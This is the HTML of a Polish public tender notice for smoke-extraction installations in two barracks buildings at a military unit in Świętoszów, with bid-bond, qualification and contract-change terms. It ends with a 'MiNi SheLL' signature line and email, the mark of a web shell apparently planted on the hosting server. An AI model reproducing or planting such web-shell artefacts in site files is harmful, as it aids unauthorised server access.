<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-1, 45.31.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium 
w wysokości:
- 5 000,00 zł - część I
- 5 000,00 zł - część II.
Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego do dnia 28.09.2015 r. do godz. 10.00. Nie dopuszcza się wnoszenia wadium w formie gotówki do kasy Zamawiającego.
Wadium wniesione w postaci poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych oraz poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.) musi zawierać co najmniej:
1) nazwę i adres Wykonawcy; 
2) nazwę i adres beneficjenta; 
3) nazwę i adres gwaranta/ poręczyciela;
4) nazwa zadania, na które składane jest wadium;
5) kwotę;
6) termin ważności;
7) wskazanie wszystkich przypadków powodujących utratę wadium zgodnie z art. art. 46 ust. 4a i  ust. 5 Ustawy Pzp.
Wadium, o którym mowa w pkt 3.6.3 musi zostać złożone w kasie Zamawiającego (bud. RZI, pok. 20) w terminie do dnia - 28.09.2015 r. do godz. 10.00. 
W przypadku, gdy Wykonawca nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 Ustawy Pzp, albo nie zgodził się na przedłużenie okresu związania ofertą, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt 2.
W przypadku wnoszenia wadium w pieniądzu należy je wpłacić na konto NBP o/Okr we Wrocławiu 78 1010 1674 0030 7213 9120 1000, z dopiskiem Wadium dotyczące przetargu nieograniczonego na wykonanie instalacji oddymiania 2 klatek schodowych w budynku nr 5 oraz w budynku nr 6 na terenie JW 2399 Świętoszów, ul. Sztabowa 1 - część I/część II.
Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem 
pkt 3.6.7 SIWZ.
Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.
Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po wniesieniu wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, że wykonał  co najmniej 1 robotę budowlaną o zakresie podobnym do  przedmiotu zamówienia , polegającą na wykonawstwie instalacji wodociągowych w budynku o kubaturze min. 15 000 m3. Na potwierdzenie ww. warunku Wykonawca załączy do oferty wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, dat i miejsc wykonania (oryginał podpisany przez Wykonawcę) - Formularz nr 3, wraz z załączeniem dowodów dotyczących najważniejszych robót określających, że roboty zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone (oryginał lub kopia dokumentu poświadczona 
za zgodność z oryginałem przez Wykonawcę). 
Za główną robotę budowlaną Zamawiający uznaje robotę wskazaną w pkt 1.5.4 SIWZ.
Dowodem, o którym mowa powyżej jest poświadczenie lub inny dokument, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w poświadczenia. 
Wykonawca, w miejsce w/w poświadczeń, może przedkładać dokumenty potwierdzające należyte wykonanie roboty budowlane, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231).
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 8). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział w postępowaniu (np. jako podwykonawca, doradca, konsultant).
Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa 
w art. 22 ust. 1 pkt 2 Ustawy będzie polegał na wiedzy i doświadczeniu innych podmiotów na zasadach, określonych w art. 26 ust. 2b Ustawy, podmioty 
te są zobowiązane załączyć dokument, o którym mowa w pkt 1.1 ppkt 1.1.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje kierownikiem budowy, który posiada uprawnienia i należy do właściwej izby samorządu zawodowego:
1) Kierownik budowy z uprawnieniami budowlanymi o specjalności konstrukcyjno - budowlanej - bez ograniczeń. Osoby, które przed dniem wejścia w życie ustawy tj. przed 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2013 r. poz. 1409 
ze zm. - art. 104), uzyskały uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych budownictwie zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie;
2) Kierownik robót instalacyjnych w zakresie instalacji elektrycznych 
w ograniczonym zakresie. Osoby, które przed dniem wejścia w życie ustawy 
tj. przed 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane 
- tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm. - art. 104), uzyskały uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych budownictwie zachowują uprawnienia do pełnienia tych funkcji 
w dotychczasowym zakresie.
Na potwierdzenie ww. warunku Wykonawca załączy wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych 
do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (oryginał podpisany przez Wykonawcę) - Formularz nr 4 oraz oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (oryginał podpisany przez Wykonawcę) - Formularz nr 5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 8). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział w postępowaniu (np. jako podwykonawca, doradca, konsultant).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi udokumentować, że wykonał  co najmniej 1 robotę budowlaną o zakresie podobnym do  przedmiotu zamówienia , polegającą na wykonawstwie instalacji wodociągowych w budynku o kubaturze min. 15 000 m3.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. informacje ogólne o Wykonawcy - Formularz Nr 1;
2. oświadczenie o spełnieniu warunków udziału w postępowaniu (oryginał podpisany przez Wykonawcę) - Formularz Nr 2;
3. propozycje ewentualnego podzlecenia elementów robót (oryginał podpisany przez Wykonawcę) - Formularz nr 6 oraz 6a; 
4. tabela elementów scalonych (oryginał podpisany przez Wykonawcę) 
- Formularz nr 7;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 
1) Terminu wykonania przedmiotu umowy w przypadku:
a) wystąpienia okoliczności uniemożliwiających realizację robót w terminie umownym. Za okoliczności takie uważa się wstrzymanie robót przez Zamawiającego lub kierownika budowy w sytuacjach wskazanych w ustawie prawo budowlane, a także wystąpienia okoliczności niezależnych 
od Wykonawcy, w tym wynikających z tzw. siły wyższej (np. powodzie, huragany, gwałtowne burze) uniemożliwiających realizację robót. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy 
i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych 
ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku 
i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy,
b) stwierdzenia, że w dokumentacji projektowej przekazanej przez Zamawiającego zgodnie z § 1 ust. 2 umowy, znajdują się błędy uniemożliwiające prawidłowe i terminowe wykonanie przedmiotu umowy,
c) wprowadzenia rozwiązań zamiennych  na zasadach określonych w § 2 umowy, których wprowadzenie miało wpływ na termin realizacji zamówienia,
d) zawarcia umowy na zamówienie dodatkowe, którego realizacja wpływa na realizację zamówienia podstawowego,
e) wydłużenia procedury przetargowej (spowodowanej m. in. przedłużeniem przez Zamawiającego terminu związania ofertą, wpłynięcia odwołania),
f) ujawnienia się w trakcie realizacji przedmiotu zamówienia przeszkód w obiekcie lub terenie/gruncie,
g) ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód formalno-prawnych,
2) Wprowadzenia rozwiązań zamiennych o których mowa w § 2 umowy.
3) Zmiany kierownika budowy lub kierowników robót, pod warunkiem, że nowa osoba będzie spełniać wymagania  określone w SIWZ dla danej funkcji.
4) Zmiany zakresu robót realizowanych przez podwykonawcę, wskazanych w Formularzu nr, lub powierzenia części zamówienia podwykonawcy mimo braku takiego wskazania w Formularzu nr , z przyczyn obiektywnie uzasadnionych. 
5) Wszelkie zmiany do niniejszej umowy (poza zamianami wskazanymi w pkt 3 i 4) wymagają pod rygorem nieważności zachowania formy pisemnej poprzez spisanie aneksu do umowy.
6) Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi gwarancji oraz nie zakończonych rozliczeń wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziwroclaw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - pok. 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław - pok. 101 (kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYKONANIE INSTALACJI ODDYMIANIA 2 KLATEK SCHODOWYCH
CZĘŚĆ I -  wymiana instalacji oddymiania 2 klatek schodowych w budynku nr 5 na terenie 
JW 2399 Świętoszów ul. Sztabowa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek koszarowy nr 5 jest to budynkiem trzykondygnacyjnym     podpiwniczonym z poddaszem nieużytkowym  o bryle prostej  wzniesionej na planie wydłużonego prostokąta  z dwuspadowym dachem krytym dachówką  ceramiczną. Ściany budynku murowane, stropy  prefabrykowane z płyt WPS, schody kamienne oparte na belkach stalowych .Elewacje budynku wykończone  cegłą klinkierową. Budynek wyposażony jest w instalacje: elektryczną, teletechniczną , wodno  - kanalizacyjną,  centralnego ogrzewania  oraz instalację odgromową.
Ustalenia  zawarte w  niniejszej  Specyfikacji dotyczą  prowadzenia prac przy realizacji wykonania instalacji oddymiającej w budynku nr 5 w Świętoszowie :
- Montaż stolarki drzwiowej o odporności ogniowej EI 30 
- Wymiana stolarki drzwiowej drewnianej na stolarkę o odporności ogniowej EI 30 
- Wykonanie instalacji oddymiania klatek schodowych
- Montaż okien oddymiających w połaci dachu  z deflektorem i siłownikami
- Montaż ścianek o odporności ogniowej REI 60
- Wykonanie obróbek blacharskich w miejscu montażu okien oddymiających..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-1, 45.31.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYKONANIE INSTALACJI ODDYMIANIA 2 KLATEK SCHODOWYCH
CZĘŚĆ II - wymiana instalacji oddymiania 2 klatek schodowych w budynku nr 6 na terenie JW 2399 Świętoszów ul. Sztabowa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek koszarowy nr 6 jest to budynkiem trzykondygnacyjnym     podpiwniczonym z poddaszem nieużytkowym  o bryle prostej  wzniesionej na planie wydłużonego prostokąta  z dwuspadowym dachem krytym dachówką  ceramiczną. Ściany budynku murowane, stropy  prefabrykowane z płyt WPS, schody kamienne oparte na belkach stalowych .Elewacje budynku wykończone  cegłą klinkierową. Budynek wyposażony jest w instalacje : elektryczną, teletechniczną , wodno  - kanalizacyjną,  centralnego ogrzewania  oraz instalację odgromową .
Zakres robót objętych w Specyfikacji Technicznej
Ustalenia  zawarte w  niniejszej  Specyfikacji dotyczą  prowadzenia prac przy realizacji wykonania instalacji oddymiającej w budynku nr 6 w Świętoszowie :
- Montaż stolarki drzwiowej o odporności ogniowej EI 30 
- Wymiana stolarki drzwiowej drewnianej na stolarkę o odporności ogniowej EI 30 
- Wykonanie instalacji oddymiania klatek schodowych
- Montaż okien oddymiających w połaci dachu  z deflektorem i siłownikami
- Montaż ścianek o odporności ogniowej REI 60
- Wykonanie obróbek blacharskich w miejscu montażu okien oddymiających..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-1, 45.31.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com